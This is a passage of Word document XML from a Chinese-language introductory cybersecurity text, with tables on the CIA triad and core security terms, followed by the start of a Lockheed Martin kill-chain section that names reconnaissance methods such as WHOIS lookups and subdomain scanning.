        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CIA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>三元组原则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325"/>
        <w:gridCol w:w="2446"/>
        <w:gridCol w:w="2004"/>
        <w:gridCol w:w="2069"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5066A209" w14:textId="77777777" w:rsidTr="00501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1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43459C5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原则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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764B48E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定义</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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D6F8B32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安全措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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B3BCE50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破坏后果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5D79C56D" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C631E58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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>机密性</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="518FDF19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rFonts w:cs="Times New Roman"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确保信息仅被授权访问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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="176EA6B7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加密技术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/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访问控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0AFE6BC9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数据泄露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/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商业机密失窃</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="62F210B1" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2397C469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rFonts w:cs="Times New Roman"/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完整性</w:t>
            </w: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 xml:space="preserve"> (Integrity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1056B382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rFonts w:cs="Times New Roman"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防止未授权篡改数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1133" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="69314104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数字签名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/Hash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校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21981889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数据篡改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/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财务欺诈</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7B57F457" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B7736BB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可用性</w:t>
            </w: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 xml:space="preserve"> (Availability)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="277B9B5F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确保授权用户可正常访问资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1133" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C0453AB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DDoS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防护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/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冗余架构</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D0A9DE3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服务中断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/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业务瘫痪</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78459681" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ABB818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现代扩展原则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2337A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>真实性</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Authenticity)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：验证用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统身份（多因素认证）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133DC975" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可否认性</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Non-repudiation)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：操作可追溯（区块链</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审计日志）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446643FA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Hlk200636933"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网络安全核心术语</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AA9AF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>网络安全核心术语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329"/>
        <w:gridCol w:w="2811"/>
        <w:gridCol w:w="3704"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7D52E5A1" w14:textId="77777777" w:rsidTr="00501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55C6C94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术语</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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BE209C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定义</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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9F5FF60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案例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3D4B5416" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="704056EF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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Vulnerability)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1589" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F53FBFE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rFonts w:cs="Times New Roman"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系统存在的安全缺陷</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03F73224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Apache Log4j2 RCE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漏洞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 xml:space="preserve"> (CVE-2021-44228)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="6A51A2F8" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DE5B500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rFonts w:cs="Times New Roman"/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lastRenderedPageBreak/>
              <w:t>威胁</w:t>
            </w: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 xml:space="preserve"> (Threat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1589" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="405D6EC8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rFonts w:cs="Times New Roman"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可能利用漏洞造成损害的因素</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B6FC7D2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勒索软件组织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Conti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="14CF7C6D" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="58E60292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攻击</w:t>
            </w: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 xml:space="preserve"> (Attack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1589" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0AFD8C42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实际实施的恶意行为</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BFA8510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钓鱼邮件携带恶意附件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="33BC5248" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76E50B41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风险</w:t>
            </w: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 xml:space="preserve"> (Risk)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1589" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BEDBC84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威胁利用漏洞造成损失的可能性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7A65F030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SQL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注入导致百万用户数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="46B52B5A" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5AAD5CE9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攻击面</w:t>
            </w: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 xml:space="preserve"> (Attack Surface)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1589" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47D23ECB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系统可被攻击的所有入口点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67BFDE04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开放端口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/Web API/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员工账户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4BA5E1DB" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2F4CE4C0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零日漏洞</w:t>
            </w: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 xml:space="preserve"> (0-day)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1589" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33F07769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未被公开且无补丁的漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B21D2EF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Pegasus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间谍软件利用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iOS 0-day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35D66FE4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8F55CA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>黑客攻击路径详解（基于洛克希德·马丁杀伤链模型）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB3006" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A265BAC" wp14:editId="4C9793F9">
            <wp:extent cx="5615940" cy="431165"/>
            <wp:effectExtent l="0" t="0" r="381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49F3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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>侦察</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reconnaissance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF794BE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目标：收集目标信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B120FF9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技术手段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB90DC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WHOIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询（域名注册信息）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F113C0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子域名扫描（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>subfinder/amass</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F7FB2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
